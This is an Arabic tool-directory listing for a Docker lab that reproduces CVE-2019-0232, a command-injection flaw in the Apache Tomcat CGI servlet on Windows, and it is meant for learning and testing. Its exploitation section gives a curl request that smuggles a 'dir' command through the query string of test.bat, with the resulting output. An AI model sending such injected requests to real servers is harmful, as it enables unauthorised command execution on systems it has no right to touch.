Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Preproduce-CVE-2019-0232 | Kitploit
أدوات/GitHubGitHub/luongchivi/preproduce-cve-2019-0232
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubluongchivi/preproduce-cve-2019-0232

Preproduce-CVE-2019-0232

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-0232 - تنفيذ التعليمات البرمجية عن بُعد في Apache Tomcat CGI Servlet

يوفر هذا المستودع بيئة مختبرية قائمة على Docker لإعادة إنتاج ثغرة CVE-2019-0232 في Apache Tomcat 9.0.17 على نظام Windows.

نظرة عامة على الثغرة

تعد CVE-2019-0232 ثغرة تنفيذ تعليمات برمجية عن بُعد في Apache Tomcat CGI Servlet عند تشغيله على نظام Windows. تنشأ المشكلة بسبب المعالجة غير السليمة لوسائط سطر الأوامر عندما يتم تعيين المعامل enableCmdLineArguments إلى true. يمكن للمهاجم تمرير وسائط عشوائية إلى سكربت CGI عبر سلسلة الاستعلام، مما يؤدي إلى تنفيذ أوامر النظام.

  • الإصدارات المتأثرة: Apache Tomcat 9.0.0.M1 إلى 9.0.17
  • الإصدارات المُصحَّحة: 9.0.18 والإصدارات الأحدث
  • الشروط المطلوبة:
    • نظام التشغيل Windows
    • تعيين enableCmdLineArguments=true في إعدادات CGI servlet
    • تمكين CGI servlet وربطه بنمط URL

بيئة المختبر

هيكل الدليل

root@kitploit:~
tomcat-cgi-lab
├── docker-compose.yml
├── Dockerfile
└── tomcat
	├── apache-tomcat-9.0.17-windows-x64.zip
    └── apache-tomcat-9.0.17
        ├── conf
        │   └── context.xml              ← (privileged="true")
        └── webapps
            └── ROOT
                └── WEB-INF
                    ├── web.xml           ← (CGI configuration)
                    └── cgi-bin
                        └── test.bat      ← (.bat script)

ملفات الإعداد

  • context.xml: يضبط privileged="true" للسماح لتطبيق الويب باستخدام CGI servlet.
  • web.xml: يعرّف CGI servlet مع enableCmdLineArguments=true ويربطه بالنمط /cgi-bin/*.
  • test.bat: سكربت دفعي بسيط يُرجع رسالة ترحيب.

البدء

المتطلبات الأساسية

  • Docker (وضع حاويات Windows)
  • Docker Compose

الإنشاء والتشغيل

root@kitploit:~
docker-compose build --no-cache
docker-compose up -d

الاستغلال

root@kitploit:~
curl -i "http://localhost:8080/cgi-bin/test.bat?&dir"

Welcome to CGI Test Page
 Volume in drive C has no label.
 Volume Serial Number is 3E70-7C38

 Directory of C:\apache-tomcat-9.0.17\webapps\ROOT\WEB-INF\cgi-bin

07/12/2026  11:45 AM    <DIR>          .
07/12/2026  11:45 AM    <DIR>          ..
07/12/2026  12:25 PM                78 test.bat
               1 File(s)             78 bytes
               2 Dir(s)  136,027,971,584 bytes free
تنزيل الأداة